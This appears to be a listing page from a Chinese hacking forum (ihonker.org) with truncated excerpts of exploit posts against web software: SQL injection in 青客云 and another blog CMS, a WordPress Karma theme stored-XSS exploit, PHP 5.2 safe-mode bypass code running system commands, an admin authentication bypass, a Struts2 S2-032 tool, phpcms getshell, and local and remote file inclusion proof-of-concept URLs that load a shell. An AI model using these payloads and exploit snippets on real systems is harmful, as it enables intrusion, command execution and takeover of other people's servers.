青客云sql注入漏洞第二发

本文出自红客联盟 太极实验室(ihonker.org) 这次不是延时注入,问题是出现在评论时获取ip处, 在发表评论的时候,发现,ip可以伪造,并且被带入到feedback数据库里面,一枚完美的注入产生了,在发表评论的时候,ip伪造下 8.8.8.8\&qu...

WordPress Karma 4.7 – Responsive Theme Exploit

<?php /**  * Exploit Title: Karma Theme Exploit  * Version: 4.7  * Tested on: Debian 8, PHP 5.6.17-3  * Type: Authenticated Options overwrite, Stored XSS  * Time line: Found [28-Apr-2016], Vendor notified [...

绕过PHP5.2.X的安全模式

php版本小于等于5.2.* <?php         //Exploit Code         system('\dir');         system('\net user');         print passthru ('\ipconfig');         exec('\whoami',$a);         print_r($a);         //Shel...

Alibaba Clone B2B Script管理身份绕过漏洞

# Exploit Title: Alibaba Clone B2B Script Admin Authentication Bypass # Vendor Homepage: [url]http://alibaba-clone.com/[/url] # Version: All Versions     Exploit : For enter , simply enter the following code h...

Struts2-032漏洞利用工具

转载自shack2 新鲜出炉支持Struts2 s2-032漏洞的检查利用。如果有对Struts2 S2-029 这个鸡肋漏洞有兴趣的可以找我要下检查工具,这个鸡肋工具就不在这里共享了。 顺便分享下我改写的exp: S2-032 20160426 漏洞参考 http://seclab.db...

青云客博客cms某处盲注

延时注入,写代码受网速影响比较严重,网速不稳的话,可能误差比较大,当然,你可以适当把sleep数字搞大些,freebuf上面有一个转换成二进制,然后再开8个线程跑数据的思路,这里我就不写了。 在include/class_temp.php中 function a...

phpcmsV9.6 getshell

这个漏洞来自乌云,经过本地环境测试后,发现漏洞确实存在。 详细说明: PHP双字节编码,这个本不应该出现的问题,或许因为过去太久远快被遗忘了,phpcms从20140929的v9.5.9版本起,增加了mysqli的支持,因为编写疏忽,导致该问题又...

WordPress Abtest本地文件包含漏洞

出现漏洞的文件为:abtest_admin.php <?php require 'admin/functions.php'; if (isset($_GET['action'])) { include 'admin/' . $_GET['action'] . '.php'; } else { include 'admin/list_experimen...

WordPress Site Import Plugin 1.0.1本地和远程文件包含漏洞

POC 远程文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls 本地文件包含 == http://localhost/wordpress/wp-content/plugins/site-import...

Fiyo CMS 2.0.2.1 XSS漏洞

*3. Affected Modules* Affected fields in the modules are listed below: i. Users User Group -> Group Name, Description ii. Modules Module Details->Judul Modul, Posisi iii. Menus Main Menu->...

1...45678...38

插入图片
返回顶部